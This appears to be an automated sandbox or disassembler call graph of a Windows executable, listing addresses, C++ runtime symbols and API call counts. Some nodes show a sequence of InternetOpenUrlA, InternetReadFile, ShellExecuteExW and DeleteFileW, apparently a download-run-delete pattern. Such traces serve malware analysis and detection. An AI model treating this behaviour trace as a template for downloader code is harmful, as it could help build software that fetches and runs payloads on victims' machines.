std::ios_base::failure::failure 32 API calls 15743->15744 15745 7ff658e21df0 15744->15745 15746 7ff658e21e53 std::ios_base::failure::failure 15745->15746 16104 7ff658e23d90 15745->16104 15749 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15746->15749 15748 7ff658e21e1a 16108 7ff658e21950 15748->16108 15751 7ff658e21e7a 15749->15751 15753 7ff658e2d840 _handle_error 8 API calls 15751->15753 15756 7ff658e21e92 15753->15756 15756->15049 15757 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15758 7ff658e21e48 15757->15758 16123 7ff658e24ef0 15758->16123 15761 7ff658e266f7 15760->15761 15762 7ff658e266b8 15760->15762 15763 7ff658e2d840 _handle_error 8 API calls 15761->15763 15764 7ff658e2d5b4 5 API calls 15762->15764 15765 7ff658e2670b 15763->15765 15766 7ff658e266c4 15764->15766 15765->15054 15766->15761 15767 7ff658e2d414 16 API calls 15766->15767 15768 7ff658e266ea 15767->15768 15769 7ff658e2d554 4 API calls 15768->15769 15769->15761 15771 7ff658e261df 15770->15771 15772 7ff658e2621e 15770->15772 15774 7ff658e2d5b4 5 API calls 15771->15774 15773 7ff658e2d840 _handle_error 8 API calls 15772->15773 15775 7ff658e26232 15773->15775 15776 7ff658e261eb 15774->15776 15775->15064 15776->15772 15777 7ff658e2d414 16 API calls 15776->15777 15778 7ff658e26211 15777->15778 15779 7ff658e2d554 4 API calls 15778->15779 15779->15772 15781 7ff658e225c8 std::ios_base::failure::failure _Func_class 15780->15781 15782 7ff658e28690 std::ios_base::failure::failure 15 API calls 15781->15782 15783 7ff658e225fd Concurrency::details::WorkQueue::IsStructuredEmpty 15781->15783 15782->15783 16165 7ff658e23b10 15783->16165 15785 7ff658e21327 15786 7ff658e22690 15785->15786 15787 7ff658e226b5 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure _Func_class type_info::_name_internal_method 15786->15787 15788 7ff658e226ef Concurrency::details::WorkQueue::IsStructuredEmpty 15787->15788 15789 7ff658e28690 std::ios_base::failure::failure 15 API calls 15787->15789 15790 7ff658e23b10 21 API calls 15788->15790 15789->15788 15791 7ff658e21343 15790->15791 15792 7ff658e224e0 15791->15792 16169 7ff658e28750 15792->16169 15794 7ff658e2250a Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15794->15081 15796 7ff658e28440 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15795->15796 15797 7ff658e24ed3 Concurrency::details::WorkQueue::IsStructuredEmpty 15796->15797 15797->15083 15799 7ff658e239b8 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15798->15799 16185 7ff658e27150 15799->16185 15801 7ff658e23a08 Concurrency::details::WorkQueue::IsStructuredEmpty 15801->15091 16189 7ff658e2ac70 15802->16189 15804 7ff658e21ec7 Concurrency::details::WorkQueue::IsStructuredEmpty 15805 7ff658e21ed1 PathFileExistsW 15804->15805 15806 7ff658e21ede 15805->15806 15807 7ff658e24ef0 17 API calls 15806->15807 15808 7ff658e21efd 15807->15808 15809 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15808->15809 15810 7ff658e21f08 15809->15810 15811 7ff658e2d840 _handle_error 8 API calls 15810->15811 15812 7ff658e213d0 15811->15812 15812->15094 15812->15095 15814 7ff658e25bef 15813->15814 15815 7ff658e25bb0 15813->15815 15816 7ff658e2d840 _handle_error 8 API calls 15814->15816 15817 7ff658e2d5b4 5 API calls 15815->15817 15818 7ff658e25c06 15816->15818 15819 7ff658e25bbc 15817->15819 15818->15101 15819->15814 15820 7ff658e2d414 16 API calls 15819->15820 15821 7ff658e25be2 15820->15821 15822 7ff658e2d554 4 API calls 15821->15822 15822->15814 16216 7ff658e2d7d0 15823->16216 15825 7ff658e22284 InternetOpenA 15826 7ff658e223b8 15825->15826 15827 7ff658e222ca InternetOpenUrlA 15825->15827 15828 7ff658e2d840 _handle_error 8 API calls 15826->15828 15829 7ff658e223ad InternetCloseHandle 15827->15829 15830 7ff658e22305 15827->15830 15831 7ff658e214ca 15828->15831 15829->15826 16218 7ff658e236b0 15830->16218 15831->15109 15833 7ff658e22397 InternetCloseHandle 16242 7ff658e268a0 15833->16242 15834 7ff658e22349 InternetReadFile 15836 7ff658e2232b 15834->15836 15837 7ff658e2238d 15834->15837 15836->15833 15836->15834 15836->15837 16228 7ff658e2b470 15836->16228 16237 7ff658e28ef0 15837->16237 16531 7ff658e26380 15840->16531 15842 7ff658e21f6f shared_ptr 15843 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15842->15843 15844 7ff658e21f87 15843->15844 15845 7ff658e22690 32 API calls 15844->15845 15846 7ff658e21fa4 15845->15846 15847 7ff658e224e0 32 API calls 15846->15847 15848 7ff658e21fcd 15847->15848 15849 7ff658e22540 32 API calls 15848->15849 15850 7ff658e21ff5 15849->15850 15851 7ff658e224e0 32 API calls 15850->15851 15852 7ff658e2201e 15851->15852 15853 7ff658e22540 32 API calls 15852->15853 15854 7ff658e22046 15853->15854 15855 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15854->15855 15856 7ff658e22054 15855->15856 15857 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15856->15857 15858 7ff658e22062 15857->15858 15859 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15858->15859 15860 7ff658e22070 15859->15860 15861 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15860->15861 15862 7ff658e2207e 15861->15862 15863 7ff658e23a20 std::ios_base::failure::failure 32 API calls 15862->15863 15864 7ff658e220ac 15863->15864 15865 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15864->15865 15866 7ff658e220d3 15865->15866 15867 7ff658e21ab0 38 API calls 15866->15867 15868 7ff658e220f5 15867->15868 15869 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15868->15869 15870 7ff658e2210e 15869->15870 15871 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15870->15871 15872 7ff658e2211c 15871->15872 15873 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15872->15873 15874 7ff658e2212a 15873->15874 15875 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15874->15875 15876 7ff658e22138 15875->15876 15877 7ff658e2d840 _handle_error 8 API calls 15876->15877 15878 7ff658e215fc 15877->15878 15879 7ff658e25db0 15878->15879 15880 7ff658e25e5d 15879->15880 15881 7ff658e25e1e 15879->15881 15883 7ff658e2d840 _handle_error 8 API calls 15880->15883 15882 7ff658e2d5b4 5 API calls 15881->15882 15885 7ff658e25e2a 15882->15885 15884 7ff658e25e71 15883->15884 15884->15140 15885->15880 15886 7ff658e2d414 16 API calls 15885->15886 15887 7ff658e25e50 15886->15887 15888 7ff658e2d554 4 API calls 15887->15888 15888->15880 16541 7ff658e28790 15889->16541 15891 7ff658e2256a Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15891->15162 15893 7ff658e25f41 15892->15893 15894 7ff658e25f02 15892->15894 15896 7ff658e2d840 _handle_error 8 API calls 15893->15896 15895 7ff658e2d5b4 5 API calls 15894->15895 15898 7ff658e25f0e 15895->15898 15897 7ff658e25f55 15896->15897 15897->15177 15898->15893 15899 7ff658e2d414 16 API calls 15898->15899 15900 7ff658e25f34 15899->15900 15901 7ff658e2d554 4 API calls 15900->15901 15901->15893 15903 7ff658e21aea 15902->15903 15904 7ff658e21c26 15903->15904 15905 7ff658e21afb type_info::_name_internal_method 15903->15905 15906 7ff658e22760 32 API calls 15904->15906 15908 7ff658e21b16 15905->15908 15909 7ff658e21b2c 15905->15909 15907 7ff658e21c42 15906->15907 15910 7ff658e25500 17 API calls 15907->15910 16545 7ff658e25560 15908->16545 15912 7ff658e25560 32 API calls 15909->15912 15913 7ff658e21c59 15910->15913 15914 7ff658e21b2a 15912->15914 15915 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15913->15915 16549 7ff658e22760 15914->16549 15948 7ff658e21c24 15915->15948 15918 7ff658e2ac70 34 API calls 15919 7ff658e21c7b Concurrency::details::WorkQueue::IsStructuredEmpty 15918->15919 15922 7ff658e21ccd ShellExecuteExW 15919->15922 15920 7ff658e22540 32 API calls 15921 7ff658e21b85 15920->15921 15923 7ff658e224e0 32 API calls 15921->15923 15924 7ff658e21d0f WaitForSingleObject 15922->15924 15925 7ff658e21d22 GetExitCodeProcess CloseHandle 15922->15925 15926 7ff658e21bae 15923->15926 15924->15925 15927 7ff658e24ef0 17 API calls 15925->15927 15928 7ff658e22540 32 API calls 15926->15928 15929 7ff658e21d58 15927->15929 15930 7ff658e21bd6 15928->15930 15931 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15929->15931 15932 7ff658e25500 17 API calls 15930->15932 15933 7ff658e21d66 15931->15933 15934 7ff658e21bed 15932->15934 15936 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15933->15936 15935 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15934->15935 15937 7ff658e21bfa 15935->15937 15938 7ff658e21d74 15936->15938 15939 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15937->15939 15940 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15938->15940 15941 7ff658e21c08 15939->15941 15942 7ff658e21d82 15940->15942 15943 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15941->15943 15944 7ff658e2d840 _handle_error 8 API calls 15942->15944 15945 7ff658e21c16 15943->15945 15946 7ff658e21818 15944->15946 15947 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15945->15947 15946->15206 15947->15948 15948->15918 15950 7ff658e239a0 std::ios_base::failure::failure 21 API calls 15949->15950 15951 7ff658e2219a 15950->15951 15952 7ff658e21ea0 35 API calls 15951->15952 15953 7ff658e221a9 15952->15953 15954 7ff658e2ac70 34 API calls 15953->15954 15968 7ff658e22225 15953->15968 15956 7ff658e221c6 Concurrency::details::WorkQueue::IsStructuredEmpty 15954->15956 15955 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15969 7ff658e221fd 15955->15969 15957 7ff658e221d0 DeleteFileW 15956->15957 15959 7ff658e221dd 15957->15959 15960 7ff658e22205 15957->15960 15958 7ff658e2d840 _handle_error 8 API calls 15961 7ff658e21845 15958->15961 15962 7ff658e24ef0 17 API calls 15959->15962 15963 7ff658e24ef0 17 API calls 15960->15963 15961->15210 15964 7ff658e221ef 15962->15964 15965 7ff658e22217 15963->15965 15966 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15964->15966 15967 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 15965->15967 15966->15969 15967->15968 15968->15955 15968->15969 15969->15958 15973 7ff658e2d5ca 15970->15973 15971 7ff658e2d5cf LeaveCriticalSection 15973->15971 15975 7ff658e2d660 15973->15975 15976 7ff658e2d691 LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 15975->15976 15977 7ff658e2d674 15975->15977 15977->15976 15979 7ff658e28958 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 15978->15979 15982 7ff658e28980 15979->15982 15981 7ff658e28972 15981->15692 15983 7ff658e28a01 15982->15983 15985 7ff658e289a4 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 15982->15985 15986 7ff658e22bf0 15983->15986 15985->15981 15987 7ff658e22c12 std::ios_base::failure::failure 15986->15987 15989 7ff658e22c1e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15987->15989 15994 7ff658e28690 15987->15994 15997 7ff658e286d0 15989->15997 15991 7ff658e22c64 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 15993 7ff658e22cd8 std::ios_base::failure::failure 15991->15993 16001 7ff658e28ff0 15991->16001 15993->15985 16004 7ff658e2be14 15994->16004 15998 7ff658e286e8 allocator 15997->15998 16028 7ff658e22840 15998->16028 16074 7ff658e22970 16001->16074 16003 7ff658e29012 16003->15993 16009 7ff658e2bc6c 16004->16009 16008 7ff658e2be36 16017 7ff658e2e898 16009->16017 16011 7ff658e2bca0 16012 7ff658e2e950 16011->16012 16013 7ff658e2e98c RtlPcToFileHeader 16012->16013 16014 7ff658e2e96f 16012->16014 16015 7ff658e2e9b3 RaiseException 16013->16015 16016 7ff658e2e9a4 16013->16016 16014->16013 16015->16008 16016->16015 16018 7ff658e2e8ee __std_exception_copy 16017->16018 16019 7ff658e2e8b9 16017->16019 16018->16011 16019->16018 16021 7ff658e3b3b4 16019->16021 16022 7ff658e3b3cb 16021->16022 16023 7ff658e3b3c1 16021->16023 16024 7ff658e35e24 _set_errno_from_matherr 13 API calls 16022->16024 16023->16022 16026 7ff658e3b3e6 16023->16026 16025 7ff658e3b3d2 _invalid_parameter_noinfo 16024->16025 16025->16018 16026->16025 16027 7ff658e35e24 _set_errno_from_matherr 13 API calls 16026->16027 16027->16025 16029 7ff658e22860 16028->16029 16030 7ff658e22854 16028->16030 16032 7ff658e2285e 16029->16032 16042 7ff658e26f00 16029->16042 16034 7ff658e22880 16030->16034 16032->15991 16035 7ff658e228a8 16034->16035 16036 7ff658e228a3 16034->16036 16038 7ff658e26f00 _Allocate 4 API calls 16035->16038 16045 7ff658e28340 16036->16045 16040 7ff658e228b2 16038->16040 16041 7ff658e228d2 16040->16041 16049 7ff658e3361c 16040->16049 16041->16032 16057 7ff658e2d190 16042->16057 16046 7ff658e2834e stdext::threads::lock_error::lock_error 16045->16046 16047 7ff658e2e950 std::_Xinvalid_argument 2 API calls 16046->16047 16048 7ff658e2835f 16047->16048 16048->16035 16050 7ff658e33635 16049->16050 16053 7ff658e3364c IsProcessorFeaturePresent 16050->16053 16054 7ff658e3365f 16053->16054 16055 7ff658e333e8 _invalid_parameter_noinfo_noreturn 14 API calls 16054->16055 16056 7ff658e3367a GetCurrentProcess TerminateProcess 16055->16056 16058 7ff658e2d19b 16057->16058 16059 7ff658e26f13 16058->16059 16060 7ff658e38724 std::_Facet_Register 2 API calls 16058->16060 16061 7ff658e2d1ba 16058->16061 16059->16032 16060->16058 16062 7ff658e2d1c5 16061->16062 16066 7ff658e2db00 16061->16066 16070 7ff658e2db20 16062->16070 16067 7ff658e2db0e std::bad_alloc::bad_alloc 16066->16067 16068 7ff658e2e950 std::_Xinvalid_argument RtlPcToFileHeader RaiseException 16067->16068 16069 7ff658e2db1f 16068->16069 16071 7ff658e2db2e stdext::threads::lock_error::lock_error 16070->16071 16072 7ff658e2e950 std::_Xinvalid_argument RtlPcToFileHeader RaiseException 16071->16072 16073 7ff658e2db3f 16072->16073 16075 7ff658e22989 16074->16075 16077 7ff658e22998 16074->16077 16078 7ff658e26e60 16075->16078 16077->16003 16079 7ff658e26ec4 16078->16079 16080 7ff658e3361c _invalid_parameter_noinfo_noreturn 17 API calls 16079->16080 16081 7ff658e26ee7 16079->16081 16080->16079 16081->16077 16089 7ff658e2d3d8 16082->16089 16084 7ff658e25d83 16085 7ff658e2d554 EnterCriticalSection LeaveCriticalSection 16084->16085 16086 7ff658e2d61c 16085->16086 16087 7ff658e2d62c 16086->16087 16088 7ff658e2d63e SetEvent ResetEvent 16086->16088 16090 7ff658e2d3f2 16089->16090 16092 7ff658e2d3eb 16089->16092 16093 7ff658e39584 16090->16093 16092->16084 16096 7ff658e391d0 16093->16096 16103 7ff658e34f54 EnterCriticalSection 16096->16103 16105 7ff658e23db0 std::ios_base::failure::failure 16104->16105 16126 7ff658e28a40 16105->16126 16107 7ff658e23deb Concurrency::details::WorkQueue::IsStructuredEmpty 16107->15748 16109 7ff658e21988 Concurrency::details::WorkQueue::IsStructuredEmpty _Func_class 16108->16109 16110 7ff658e2199b WideCharToMultiByte 16109->16110 16111 7ff658e219e4 Concurrency::details::WorkQueue::IsStructuredEmpty 16110->16111 16112 7ff658e21a00 WideCharToMultiByte 16111->16112 16113 7ff658e23a20 std::ios_base::failure::failure 32 API calls 16112->16113 16114 7ff658e21a48 std::ios_base::failure::failure 16113->16114 16115 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 16114->16115 16116 7ff658e21a83 16115->16116 16117 7ff658e2d840 _handle_error 8 API calls 16116->16117 16118 7ff658e21a9b 16117->16118 16119 7ff658e25500 16118->16119 16120 7ff658e25519 Concurrency::details::WorkQueue::IsStructuredEmpty 16119->16120 16121 7ff658e21e3e 16120->16121 16154 7ff658e27f70 16120->16154 16121->15757 16161 7ff658e28500 16123->16161 16125 7ff658e24f03 Concurrency::details::WorkQueue::IsStructuredEmpty 16125->15746 16127 7ff658e28a58 Concurrency::details::WorkQueue::IsStructuredEmpty 16126->16127 16130 7ff658e28a80 16127->16130 16129 7ff658e28a72 16129->16107 16131 7ff658e28b01 16130->16131 16133 7ff658e28aa4 Concurrency::details::WorkQueue::IsStructuredEmpty char_traits 16130->16133 16134 7ff658e22ad0 16131->16134 16133->16129 16135 7ff658e22af2 16134->16135 16136 7ff658e28690 std::ios_base::failure::failure 15 API calls 16135->16136 16137 7ff658e22afe Concurrency::details::WorkQueue::IsStructuredEmpty 16135->16137 16136->16137 16142 7ff658e28700 16137->16142 16139 7ff658e22b44 Concurrency::details::WorkQueue::IsStructuredEmpty 16141 7ff658e22bb8 std::ios_base::failure::failure 16139->16141 16147 7ff658e29020 16139->16147 16141->16133 16150 7ff658e22a60 16142->16150 16145 7ff658e22840 _Allocate 21 API calls 16146 7ff658e28720 16145->16146 16146->16139 16148 7ff658e22970 allocator 17 API calls 16147->16148 16149 7ff658e29048 16148->16149 16149->16141 16151 7ff658e22a8e 16150->16151 16152 7ff658e22a93 16150->16152 16153 7ff658e28340 Concurrency::cancel_current_task 2 API calls 16151->16153 16152->16145 16153->16152 16157 7ff658e28440 16154->16157 16156 7ff658e27f8e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure Concurrency::details::FreeThreadProxyFactory::Retire 16156->16121 16159 7ff658e28456 Concurrency::details::WorkQueue::IsStructuredEmpty 16157->16159 16158 7ff658e284b1 char_traits 16158->16156 16159->16158 16160 7ff658e28ff0 allocator 17 API calls 16159->16160 16160->16158 16163 7ff658e28516 Concurrency::details::WorkQueue::IsStructuredEmpty 16161->16163 16162 7ff658e28571 char_traits 16162->16125 16163->16162 16164 7ff658e29020 allocator 17 API calls 16163->16164 16164->16162 16166 7ff658e23b34 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 16165->16166 16167 7ff658e23bfe Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 16166->16167 16168 7ff658e286d0 allocator 21 API calls 16166->16168 16167->15785 16168->16167 16170 7ff658e2876b Concurrency::details::WorkQueue::IsStructuredEmpty 16169->16170 16173 7ff658e287d0 16170->16173 16172 7ff658e28781 16172->15794 16174 7ff658e2888f 16173->16174 16176 7ff658e2880e Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure char_traits 16173->16176 16177 7ff658e22fe0 16174->16177 16176->16172 16178 7ff658e23023 std::ios_base::failure::failure 16177->16178 16179 7ff658e28690 std::ios_base::failure::failure 15 API calls 16178->16179 16180 7ff658e23037 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 16178->16180 16179->16180 16181 7ff658e286d0 allocator 21 API calls 16180->16181 16183 7ff658e2309b Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 16181->16183 16182 7ff658e23142 std::ios_base::failure::failure 16182->16176 16183->16182 16184 7ff658e28ff0 allocator 17 API calls 16183->16184 16184->16182 16187 7ff658e27183 Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure _Min_value 16185->16187 16186 7ff658e2719d Concurrency::details::WorkQueue::IsStructuredEmpty std::ios_base::failure::failure 16186->15801 16187->16186 16188 7ff658e286d0 allocator 21 API calls 16187->16188 16188->16186 16190 7ff658e2aca8 Concurrency::details::WorkQueue::IsStructuredEmpty _Func_class 16189->16190 16191 7ff658e2acaf 16190->16191 16193 7ff658e2acf3 MultiByteToWideChar 16190->16193 16192 7ff658e2d840 _handle_error 8 API calls 16191->16192 16194 7ff658e2adde 16192->16194 16200 7ff658e23e50 16193->16200 16194->15804 16196 7ff658e2ad35 Concurrency::details::WorkQueue::IsStructuredEmpty _Func_class 16197 7ff658e2ad74 MultiByteToWideChar 16196->16197 16198 7ff658e2adb1 16197->16198 16199 7ff658e24ef0 17 API calls 16198->16199 16199->16191 16201 7ff658e23e76 std::ios_base::failure::failure 16200->16201 16204 7ff658e28b40 16201->16204 16203 7ff658e23eb7 Concurrency::details::WorkQueue::IsStructuredEmpty 16203->16196 16205 7ff658e28b65 Concurrency::details::WorkQueue::IsStructuredEmpty char_traits 16204->16205 16206 7ff658e28bc3 16204->16206 16205->16203 16208 7ff658e22d10 16206->16208 16209 7ff658e22d33 16208->16209 16210 7ff658e28690 std::ios_base::failure::failure 15 API calls 16209->16210 16211 7ff658e22d3f Concurrency::details::WorkQueue::IsStructuredEmpty 16209->16211 16210->16211 16212 7ff658e28700 allocator 21 API calls 16211->16212 16213 7ff658e22d85 Concurrency::details::WorkQueue::IsStructuredEmpty 16212->16213 16214 7ff658e29020 allocator 17 API calls 16213->16214 16215 7ff658e22dfa std::ios_base::failure::failure 16213->16215 16214->16215 16215->16205 16217 7ff658e2d7fb 16216->16217 16217->15825 16217->16217 16219 7ff658e236d7 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 16218->16219 16245 7ff658e237e0 16219->16245 16225 7ff658e237a1 16226 7ff658e237cd 16225->16226 16260 7ff658e2abb0 16225->16260 16226->15836 16457 7ff658e24ae0 16228->16457 16230 7ff658e2b4ac 16231 7ff658e2abb0 32 API calls 16230->16231 16232 7ff658e2b53d 16231->16232 16464 7ff658e25480 16232->16464 16233 7ff658e2b49a 16233->16230 16461 7ff658e2ac00 16233->16461 16236 7ff658e2b551 16236->15836 16499 7ff658e28e60 16237->16499 16240 7ff658e28f36 16240->15833 16241 7ff658e2abb0 32 API calls 16241->16240 16524 7ff658e24d80 16242->16524 16244 7ff658e268bc std::bad_exception::~bad_exception 16244->15829 16246 7ff658e23807 Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot 16245->16246 16264 7ff658e29bd0 16246->16264 16249 7ff658e23640 16418 7ff658e238b0 16249->16418 16251 7ff658e23653 16423 7ff658e27a30 16251->16423 16253 7ff658e23672 16254 7ff658e2a120 16253->16254 16255 7ff658e2a147 shared_ptr 16254->16255 16256 7ff658e2a14b 16254->16256 16255->16225 16256->16255 16257 7ff658e27a30 Concurrency::details::UMSSchedulerProxy::~UMSSchedulerProxy 13 API calls 16256->16257 16258 7ff658e2a184 16257->16258 16431 7ff658e23390 16258->16431 16261 7ff658e2abcc std::ios_base::good 16260->16261 16453 7ff658e28ce0 16261->16453 16273 7ff658e27cb0 16264->16273 16268 7ff658e29c14 16269 7ff658e29c3a 16268->16269 16270 7ff658e2abb0 32 API calls 16268->16270 16271 7ff658e23729 16269->16271 16284 7ff658e2c644 16269->16284 16270->16269 16271->16249 16289 7ff658e28d40 16273->16289 16276 7ff658e2d190 std::_Facet_Register 4 API calls 16277 7ff658e27d35 16276->16277 16279 7ff658e27d4c 16277->16279 16292 7ff658e24a30 16277->16292 16280 7ff658e2b3e0 16279->16280 16281 7ff658e2b3fc std::ios_base::getloc 16280->16281 16347 7ff658e234a0 16281->16347 16283 7ff658e2b415 shared_ptr ctype 16283->16268 16285 7ff658e2bb5c std::_Lockit::_Lockit 6 API calls 16284->16285 16286 7ff658e2c65c 16285->16286 16287 7ff658e2bbd4 std::_Lockit::~_Lockit LeaveCriticalSection 16286->16287 16288 7ff658e2c6b5 16287->16288 16288->16271 16295 7ff658e28d70 16289->16295 16315 7ff658e2c044 16292->16315 16296 7ff658e28dca 16295->16296 16297 7ff658e27d2b 16295->16297 16298 7ff658e2e950 std::_Xinvalid_argument 2 API calls 16296->16298 16299 7ff658e28ddf std::make_error_code 16296->16299 16297->16276 16298->16299 16303 7ff658e24940 16299->16303 16302 7ff658e2e950 std::_Xinvalid_argument 2 API calls 16302->16297 16306 7ff658e24bf0 16303->16306 16307 7ff658e23a20 std::ios_base::failure::failure 32 API calls 16306->16307 16308 7ff658e24c26 16307->16308 16309 7ff658e24410 std::ios_base::failure::failure 32 API calls 16308->16309 16310 7ff658e24c55 16309->16310 16311 7ff658e24ec0 Concurrency::details::UMSFreeThreadProxyFactory::UMSFreeThreadProxyFactory 17 API calls 16310->16311 16312 7ff658e24c60 16311->16312 16313 7ff658e2d840 _handle_error 8 API calls 16312->16313 16314 7ff658e2497d 16313->16314 16314->16302 16324 7ff658e2bb5c 16315->16324 16317 7ff658e2c066 16323 7ff658e2c089 __std_exception_copy ctype 16317->16323 16328 7ff658e2c240 16317->16328 16320 7ff658e2c07e 16331 7ff658e2c270 16320->16331 16321 7ff658e24a40 16321->16279 16335 7ff658e2bbd4 16323->16335 16325 7ff658e2bb6b 16324->16325 16326 7ff658e2bb70 16324->16326 16339 7ff658e34fc4 16325->16339 16326->16317 16329 7ff658e2d190 std::_Facet_Register 4 API calls 16328->16329 16330 7ff658e2c252 std::ios_base::_Init 16329->16330 16330->16320 16332 7ff658e2c295 16331->16332 16333 7ff658e2c282 16331->16333 16332->16323 16342 7ff658e2c8fc 16333->16342 16336 7ff658e2bbe8 16335->16336 16337 7ff658e2bbdf LeaveCriticalSection 16335->16337 16336->16321 16340 7ff658e3cac0 std::_Locinfo::_Locinfo_ctor 5 API calls 16339->16340 16341 7ff658e34fcd EnterCriticalSection 16340->16341 16343 7ff658e2c90a EncodePointer 16342->16343 16344 7ff658e2c931 16342->16344 16343->16332 16345 7ff658e383b8 BuildCatchObjectHelperInternal 30 API calls 16344->16345 16346 7ff658e2c936 16345->16346 16348 7ff658e2bb5c std::_Lockit::_Lockit 6 API calls 16347->16348 16349 7ff658e234b5 16348->16349 16361 7ff658e257b0 16349->16361 16351 7ff658e234ce std::locale::_Getfacet 16360 7ff658e234fb 16351->16360 16367 7ff658e27720 16351->16367 16352 7ff658e2bbd4 std::_Lockit::~_Lockit LeaveCriticalSection 16354 7ff658e23597 16352->16354 16354->16283 16356 7ff658e2351c 16377 7ff658e28370 16356->16377 16357 7ff658e23524 16381 7ff658e2c004 16357->16381 16360->16352 16362 7ff658e25802 16361->16362 16363 7ff658e257c4 16361->16363 16362->16351 16364 7ff658e2bb5c std::_Lockit::_Lockit 6 API calls 16363->16364 16365 7ff658e257d0 16364->16365 16366 7ff658e2bbd4 std::_Lockit::~_Lockit LeaveCriticalSection 16365->16366 16366->16362 16368 7ff658e23516 16367->16368 16369 7ff658e27748 16367->16369 16368->16356 16368->16357 16369->16368 16370 7ff658e2d190 std::_Facet_Register 4 API calls 16369->16370 16372 7ff658e27764 16370->16372 16371 7ff658e277b7 16371->16368 16396 7ff658e251d0 16371->16396 16372->16371 16384 7ff658e242e0 16372->16384 16378 7ff658e2837e std::bad_alloc::bad_alloc 16377->16378 16379 7ff658e2e950 std::_Xinvalid_argument 2 API calls 16378->16379 16380 7ff658e2838f 16379->16380 16380->16360 16382 7ff658e2d190 std::_Facet_Register 4 API calls 16381->16382 16383 7ff658e2c017 16382->16383 16383->16360 16385 7ff658e2bb5c std::_Lockit::_Lockit 6 API calls 16384->16385 16386 7ff658e242fd _Yarn 16385->16386 16387 7ff658e24383 16386->16387 16388 7ff658e24372 16386->16388 16406 7ff658e2be5c 16387->16406 16401 7ff658e2c1b8 16388->16401 16414 7ff658e2c224 16396->16414 16398 7ff658e251e3 std::_Locinfo::~_Locinfo 16399 7ff658e2bbd4 std::_Lockit::~_Lockit LeaveCriticalSection 16398->16399 16400 7ff658e25256 16399->16400 16400->16368 16402 7ff658e352d8 std::_Locinfo::_Locinfo_ctor 62 API calls 16401->16402 16403 7ff658e2c1d1 _Yarn 16402->16403 16404 7ff658e2c1fa 16403->16404 16405 7ff658e352d8 std::_Locinfo::_Locinfo_ctor 62 API calls 16403->16405 16405->16404 16407 7ff658e2bd74 13 API calls 16406->16407 16408 7ff658e2be6d 16407->16408 16409 7ff658e2e950 std::_Xinvalid_argument RtlPcToFileHeader RaiseException 16408->16409 16410 7ff658e2be7e 16409->16410 16415 7ff658e2c238 16414->16415 16416 7ff658e2c231 16414->16416 16415->16398 16417 7ff658e352d8 std::_Locinfo::_Locinfo_ctor 62 API calls 16416->16417 16417->16415 16419 7ff658e2d190 std::_Facet_Register 4 API calls 16418->16419 16420 7ff658e238d2 16419->16420 16421 7ff658e24a30 std::ios_base::_Init 35 API calls 16420->16421 